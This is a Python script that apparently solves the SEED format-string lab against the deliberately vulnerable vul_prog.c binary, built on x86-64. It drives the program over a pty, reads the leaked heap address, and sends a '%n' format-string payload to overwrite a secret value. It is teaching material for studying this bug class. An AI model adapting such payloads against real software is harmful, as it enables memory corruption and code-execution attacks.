pwn: Arch Linux gcc-multilib 5.3.0-5 gcc vul_prog.c -o a (x86-64)
#!/usr/bin/env python3
# http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String/files/vul_prog.c x86-64
import pty, os, re, struct, subprocess, sys
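def readuntil(f, delim):
    """Read *f* one byte at a time until *delim* is seen or EOF is reached.

    Args:
        f: a binary file-like object supporting ``read(1)`` (an unbuffered
            fd wrapper in this script, so each call hits the descriptor).
        delim: either a ``bytes``/``bytearray`` suffix to wait for, or a
            compiled ``re`` pattern over bytes that is searched against
            everything read so far.

    Returns:
        With a bytes delimiter: all bytes read, delimiter included (or the
        partial data if EOF arrived first).
        With a pattern: the ``re.Match`` object, or ``None`` when EOF
        arrived before the pattern matched -- callers that index into the
        match must expect that.
    """
    # isinstance rather than type() == bytes so bytearray works too.
    wants_suffix = isinstance(delim, (bytes, bytearray))
    data = b''
    while True:
        if wants_suffix:
            if data.endswith(delim):
                break
        elif delim.search(data):
            break
        chunk = f.read(1)
        # read(1) returns b'' at EOF; stop rather than spin forever.
        if not chunk:
            break
        data += chunk
    if wants_suffix:
        return data
    return delim.search(data)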
def main():
    """Drive ``/tmp/a`` (the SEED lab ``vul_prog.c`` build) over a pty.

    Reads the heap address the program prints, answers its two prompts,
    then echoes the "original secrets" and "new secrets" lines it prints.
    Everything here is tied to the exact binary named in the gist title
    (gcc-multilib 5.3.0-5, x86-64): the hard-coded path, the ``12$``
    argument index and the ``4919`` width presumably all change with
    another build.
    """
    #s = subprocess.Popen('/tmp/a', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
    # A pty instead of pipes: the child's stdin/stdout/stderr all sit on the
    # slave side, the parent talks to the master side.
    master, slave = pty.openpty()
    sub = subprocess.Popen('/tmp/a', stdin=slave, stdout=slave, stderr=slave)
    # NOTE(review): `slave` is never closed in the parent and `sub` is never
    # waited on; closing the slave fd after spawn and calling sub.wait() at
    # the end would avoid a leaked descriptor and a zombie.
    # buffering=0 so each read(1) inside readuntil() goes straight to the fd.
    s = os.fdopen(master, 'r+b', buffering=0)
    # printf("The variable secret's value is 0x%8x (on heap)\n", (unsigned int)secret);
    # `%8x` pads with spaces, hence `0x +`; the trailing \r\n is presumably the
    # pty's newline translation of the program's \n. If the program exits before
    # printing this line, readuntil() returns None and .group(1) raises AttributeError.
    h_secret = int(readuntil(s, re.compile(rb'0x +([\w+]+) \(on heap\)\r\n')).group(1), 16)
    print('%016x' % h_secret)
    readuntil(s, b'Please enter a decimal integer\r\n')
    s.write(b'0\n')
    readuntil(s, b'Please enter a string\r\n')
    # 012345670123456701234567
    # Format string followed by the packed address (native 'Q', little-endian on
    # x86-64) with trailing NUL bytes stripped -- presumably because the target
    # reads this input as a C string.
    s.write(b'%4919c%12$n.....'+struct.pack('Q', h_secret+4).rstrip(b'\0')+b'\n')
    # printf("The original secrets: 0x%x -- 0x%x\n", SECRET1, SECRET2);
    # latin-1 maps every byte, so decoding cannot fail on stray non-ASCII output.
    sys.stdout.write(readuntil(s, b'The original').decode('latin-1'))
    sys.stdout.write(readuntil(s, b'\r\n').decode('latin-1'))
    # printf("The new secrets: 0x%x -- 0x%x\n", secret[0], secret[1]);
    sys.stdout.write(readuntil(s, b'\r\n').decode('latin-1'))
    # %9$lx secret %10$lx user_input
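# Guard the entry point so importing this module (e.g. to reuse readuntil)
# does not spawn /tmp/a as a side effect; running it as a script is unchanged.
if __name__ == "__main__":
    main()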